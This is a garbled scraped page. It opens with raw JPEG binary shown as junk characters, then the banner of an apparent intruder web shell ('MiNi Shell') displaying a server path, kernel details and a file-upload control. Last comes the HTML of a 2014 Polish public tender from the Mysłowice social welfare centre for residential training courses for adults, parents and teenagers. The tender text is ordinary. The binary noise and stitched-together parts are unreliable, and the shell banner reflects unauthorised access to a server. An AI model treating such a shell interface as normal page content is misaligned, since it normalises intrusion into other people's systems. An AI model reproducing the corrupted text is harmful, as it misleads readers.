JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140605/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140605/190246-N-2014.html

<p class="kh_header"><b>Mysłowice: Szkolenia w zakresie aktywizacji społecznej uczestników projektu Mysłowickie lepsze jutro</b><br>
<b>Numer ogłoszenia: 190246 - 2014; data zamieszczenia: 05.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Gwarków 24, 41-400 Mysłowice, woj. śląskie, tel. 032 2221289, faks 032 2221289.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.mops.myslowice.bip.info.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Szkolenia w zakresie aktywizacji społecznej uczestników projektu Mysłowickie lepsze jutro.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Trening kompetencji społecznych

Liczba uczestników: 30 osób dorosłych - uczestników/uczestniczek projektu 
Liczba dzieci wymagających opieki podczas zajęć ich rodzica: 20 (w wieku od 2 do 12 lat) 
troje w wieku 2-3 lata; 7-mioro w wieku 4-6 lat; 6-cioro w wieku 8-9 lat; czworo 10-12latków
Czas trwania: 6 dni (5 noclegów) w terminie: 4-24.07.2014 r.(pobyt powinien rozpocząć się 
i zakończyć obiadem)
Liczba godzin zajęć w formie warsztatów: 35 godzin lekcyjnych  na osobę (6 dni) prowadzonych przez 2 trenerów w 2 grupach szkoleniowych.
Zakres tematyczny usługi przewidzianej do wykonania w szczególności obejmuje:  
	1) komunikację interpersonalną i asertywność w kontaktach międzyludzkich
	2) przyczyny stresu i jego niwelowanie
	3) efektywną motywację i stawianie sobie nowych wyzwań
	4) zarządzanie konfliktem i konstruktywne rozwiązywanie konfliktów
Cel szkolenia: Podniesienie kompetencji społecznych uczestników projektu (szczególnie w w/w zakresach). Osiągnięcie celu  należy udokumentować wykorzystując odpowiednie narzędzia pomiaru efektywności szkolenia (kwestionariusze ankiet, testy itp.)
2. Trening kompetencji rodzicielskich

Liczba uczestników: 16 osób dorosłych - uczestników/uczestniczek projektu 
Liczba dzieci wymagających opieki podczas zajęć ich rodzica: 21 (w wieku od 1 r.ż do 10 lat); 
9-cioro w wieku 1-3 lata; 5-cioro w wieku 4-6 lat (w tym 5-latek z niepełnosprawnością ruchową poruszający się na wózku inwalidzkim); 7-mioro w wieku 8-10 lat 
Czas trwania: 6 dni (5 noclegów) w terminie: 4.07- 7.08.2014 r. z wyjątkiem terminu 12-25.07.2014 (pobyt powinien rozpocząć się i zakończyć obiadem)
Liczba godzin zajęć w formie warsztatów: 35 godzin lekcyjnych  na osobę (6 dni)
Zakres tematyczny usługi przewidzianej do wykonania w szczególności obejmuje:  
1)	Autodiagnozę  uczestnika jako rodzica (mocne i słabe strony w procesie wychowawczym, wizerunek w oczach dziecka)
2)	Postawy i zachowania dorosłych oraz ich konsekwencje (najczęściej popełniane błędy wychowawcze)
3)	Diagnozę własnego dziecka (zasoby i ograniczenia, potrzeby, pozycja w grupie rówieśniczej)
4)	Charakterystykę rozwoju dziecka w różnych okresach życia - adekwatne zachowania rodziców 
5)	Komunikowanie się z dziećmi (stawianie granic/wymagań, wzmacnianie poczucia własnej wartości u dzieci)
6)	Stymulowanie rozwoju dziecka (animacja czasu wolnego, pomoc w nauce)
7)	Przeciwdziałanie zachowaniom agresywnym u dzieci, wagarom, uzależnieniom
Cel szkolenia: Podniesienie kompetencji rodzicielskich/wychowawczych uczestników projektu (szczególnie w w/w zakresach). Osiągnięcie celu  należy udokumentować wykorzystując odpowiednie narzędzia pomiaru efektywności szkolenia (kwestionariusze ankiet, testy itp.)
3. Trening umiejętności  społecznych z elementami planowania rodziny

Liczba uczestników: 10 osób (młodzież w wieku 15-18 lat) - uczestników/uczestniczek projektu  
Czas  trwania:  6 dni  (5 noclegów) w terminie:  18-30.08.2014 r. (pobyt powinien rozpocząć się 
i zakończyć obiadem)
Liczba godzin zajęć w formie warsztatów: 35 godzin lekcyjnych  na osobę (6 dni) 
Zakres tematyczny usługi przewidzianej do wykonania w szczególności obejmuje:  
	1) komunikację interpersonalną i asertywność w kontaktach międzyludzkich
	2) przyczyny stresu i jego niwelowanie
	3) zarządzanie konfliktem i efektywne rozwiązywanie konfliktów
	4) zagadnienia rodziny i jej funkcji
	5) rozwój psychoseksualny, higienę okresu dojrzewania 
	6) odpowiedzialne zachowania w sferze płciowości - profilaktykę (przed)wczesnego macierzyństwa oraz chorób przenoszonych drogą płciową, pornografii
	7) uzależnienia (Internet, środki psychoaktywne) 
Cel szkolenia: Nabycie umiejętności  społecznych związanych m.in. z planowaniem rodziny. Osiągnięcie celu należy udokumentować wykorzystując odpowiednie narzędzia pomiaru efektywności szkolenia (kwestionariusze ankiet, testy itp.).</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem udziału w postępowaniu jest: posiadanie wpisu do rejestru o którym mowa w ustawie o usługach turystycznych (Dz.U. 2014 poz. 196) oraz wykazanie 1 usługi wyjazdowych szkoleń minimum 3 dniowych o przedmiocie zamówienia adekwatnym do danej części zamówienia, którą świadczono grupie minimum: dla części 1 - 10 osób dorosłych, dla części 2 - 10 osób dorosłych, dla części 3 - 10 młodzieży.
Ocena dokonana będzie na podstawie złożonego dokumentu potwierdzającego wpis do rejestru organizatorów i pośredników turystycznych oraz złożonego oświadczenia wzór którego stanowi załącznik nr 1/1B do wniosku na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena dokonana będzie na podstawie złożonego oświadczenia wzór którego stanowi załącznik nr 1/1B do wniosku na zasadzie spełnia/nie spełnia oraz wypełnionego załącznika nr 2 do wniosku na podstawie którego zostaną przydzielone punkty (sposób naliczania punktów podany w załączniku).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena dokonana będzie na podstawie złożonego oświadczenia wzór którego stanowi załącznik nr 1/1B do wniosku na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena dokonana będzie na podstawie złożonego oświadczenia wzór którego stanowi załącznik nr 1/1B do wniosku na zasadzie spełnia/nie spełnia oraz wypełnionego załącznika nr 2A do wniosku na podstawie którego zostaną przydzielone punkty (sposób naliczania punktów podany w załączniku).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena dokonana będzie na podstawie złożonego oświadczenia wzór którego stanowi załącznik nr 1/1B do wniosku na zasadzie spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>W Tabeli 2 w załączniku nr 2 do wniosku należy wykazać usługi wyjazdowych szkoleń nie wymienionych w Tabeli 1, minimum 3 dniowych o przedmiocie zamówienia adekwatnym do danej części zamówienia, którą świadczono grupie minimum w części 1 i 2 to 10 osób dorosłych, a w części 3 to 10cioro młodzieży;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> negocjacje z ogłoszeniem.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 3.</p>
<p class="bold">Opis sposobu dokonywania wyboru wykonawców, którzy zostaną zaproszeni do składania ofert, gdy liczba wykonawców spełniających warunki udziału w postępowaniu będzie większa niż określona w ogłoszeniu o zamówieniu</p>
<p>wykonawcy spełniający warunki udziału w postępowaniu którzy uzyskali największą ilość punktów za doświadczenie i kadrę</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - program - 30</li>
<li>3 - lokalizacja - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie, w formie aneksu do umowy, pod rygorem nieważności takiej zmiany w zakresie osób prowadzących szkolenie pod warunkiem, że będą to osoby o doświadczeniu nie gorszym od doświadczenia kadry wykazanej w załączniku 2A do wniosku oraz terminu realizacji umowy z przyczyn nie leżących po stronie wykonawcy (np. choroba uczestników szkolenia).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.mops.myslowice.bip.info.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> MOPS Mysłowice
ul.Gwarków 24
41-400 Mysłowice
pok. 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.06.2014 godzina 10:00, miejsce: MOPS Mysłowice
ul.Gwarków 24
41-400 Mysłowice
pok. 27 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> projekt współfinansowany ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki na lata 2007-2013 Mysłowickie lepsze jutro w ramach działania 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Trening kompetencji społecznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba uczestników: 30 osób dorosłych - uczestników/uczestniczek projektu 
Liczba dzieci wymagających opieki podczas zajęć ich rodzica: 20 (w wieku od 2 do 12 lat) 
troje w wieku 2-3 lata; 7-mioro w wieku 4-6 lat; 6-cioro w wieku 8-9 lat; czworo 10-12latków
Czas trwania: 6 dni (5 noclegów) w terminie: 4-24.07.2014 r.(pobyt powinien rozpocząć się 
i zakończyć obiadem)
Liczba godzin zajęć w formie warsztatów: 35 godzin lekcyjnych  na osobę (6 dni) prowadzonych przez 2 trenerów w 2 grupach szkoleniowych.
Zakres tematyczny usługi przewidzianej do wykonania w szczególności obejmuje:  
	1) komunikację interpersonalną i asertywność w kontaktach międzyludzkich
	2) przyczyny stresu i jego niwelowanie
	3) efektywną motywację i stawianie sobie nowych wyzwań
	4) zarządzanie konfliktem i konstruktywne rozwiązywanie konfliktów
Cel szkolenia: Podniesienie kompetencji społecznych uczestników projektu (szczególnie w w/w zakresach). Osiągnięcie celu  należy udokumentować wykorzystując odpowiednie narzędzia pomiaru efektywności szkolenia (kwestionariusze ankiet, testy itp.)
Materiały dydaktyczne i inne: Wykonawca w celu realizacji przedmiotu zamówienia zapewni optymalną ilość materiałów niezbędnych do przeprowadzenia spotkań (np. podręcznik w wydaniu książkowym o treści zgodnej z tematyką spotkań, zeszyt min. 60 kartkowy, ołówek, długopis, teczka na materiały szkoleniowe). 
Opieka nad uczestnikami: Wykonawca zapewni ze swej strony koordynatora działań pobytu odpowiedzialnego za: zbiórkę, dowóz uczestników wyjazdu (z dziećmi) tam i z powrotem, zapewnienie bezpieczeństwa, organizację zajęć szkoleniowych oraz czasu wolnego i wypoczynku. 
Opieka nad dziećmi: 
1. Wykonawca na czas nieobecności osób dorosłych (odbywających zajęcia w ramach nin. zamówienia) winien zapewnić opiekę nad małoletnimi dziećmi dostosowaną do wieku dzieci i sprawowaną przez doświadczoną kadrę (3 opiekunki). 
2. Wykonawca winien zapewnić co najmniej 2 propozycje animacji dla dzieci, także podczas niesprzyjających warunków atmosferycznych (w szczególności: zabawy ruchowe na powietrzu, spacer po okolicy z możliwością zwiedzenia miejscowych atrakcji, kino, przejście na miejscowy plac zabaw, zajęcia plastyczno-ruchowe na terenie Ośrodka itp). 
Zakwaterowanie: 
1. Obiekt (min. 3 gwiazdki) powinien: mieścić się w miejscowości atrakcyjnej pod względem turystycznym, oddalonej do 200km od siedziby zamawiającego, posiadać salę szkoleniową, dysponować  salą gimnastyczną, siłownią. 
2. Wykonawca zapewni uczestnikom zakwaterowanie w pokojach 2-3 osobowych z pełnym węzłem sanitarnym (tj. umywalką, WC, prysznicem z ciepłą i zimną wodą), wyposażonych w łóżka jednoosobowe, stolik, krzesła oraz szafki na odzież a także z dostępem do TV.  Uczestnicy zostaną zakwaterowani w sposób uwzględniający płeć lub rodzinę (rodzic z dziećmi), a w przypadku nieparzystej liczby osób zapewniony zostanie pokój jednoosobowy lub dwuosobowy do pojedynczego wykorzystania. 
3.Wykonawca zapewni dostępność wody mineralnej w pokojach w ilości 1,5 l dziennie/osobę dorosłą. 

Wyżywienie: 
1. Wykonawca zapewni w cenie usługi pełne i urozmaicone wyżywienie polegające na przygotowaniu i zaserwowaniu 3 posiłków dziennie (za wyjątkiem dnia przyjazdu i wyjazdu) na każdego uczestnika wyjazdu  w postaci: śniadania w formie szwedzkiego stołu, dwudaniowego obiadu (z porcją mięsa lub ryby) z deserem i napojem oraz kolacji. Zamawiający nie dopuszcza możliwości serwowania ciepłego obiadu w formie dań gotowych typu fast-food oraz gotowych zup typu instant. Ponadto wykonawca winien uwzględnić potrzeby żywieniowe dzieci zapewniając rodzicom na ich życzenie dostęp do takich produktów żywnościowych jak np. gorące mleko, płatki śniadaniowe, czekolada lub kakao w proszku (w szczególności podczas śniadania i kolacji).
2. W trakcie odbywania zajęć warsztatowych Wykonawca zapewni codziennie uczestnikom poczęstunek w postaci: dobrej jakości kawy i herbaty (bez ograniczeń), mieszanych drobnych artykułów spożywczych (np. paluszki, krakersy, kruche ciasteczka, babeczki, rurki w ilości min. 100 g/osobę), zimnych napojów (np. woda mineralna, soki w ilości 0,5 l/osobę) oraz dodatków takich jak: cukier, mleczko, cytryna. W trakcie sprawowania opieki nad dziećmi, Wykonawca winien zaplanować przerwy w zajęciach animacyjnych, podczas których dzieci będą mogły spożyć drobną przekąskę składającą się z zestawu: np. drożdżówka/pączek/porcja owoców sezonowych oraz napoju np. woda mineralna, soki w ilości 0,5 l/dziecko. 
Transport: 
1. Wykonawca zapewni w cenie usługi transport uczestników (z dziećmi)  i ich bagażu na miejsce wykonywania usługi i z powrotem - pojazdem z ilością miejsc pozwalającą na komfortowe, swobodne podróżowanie zgłoszonej do wyjazdu grupie uczestników, sprawnym technicznie, dopuszczonym do ruchu drogowego. 
2. Miejsce wyjazdu i powrotu uczestników/uczestniczek wskaże Zamawiający (na terenie gminy Mysłowice). 
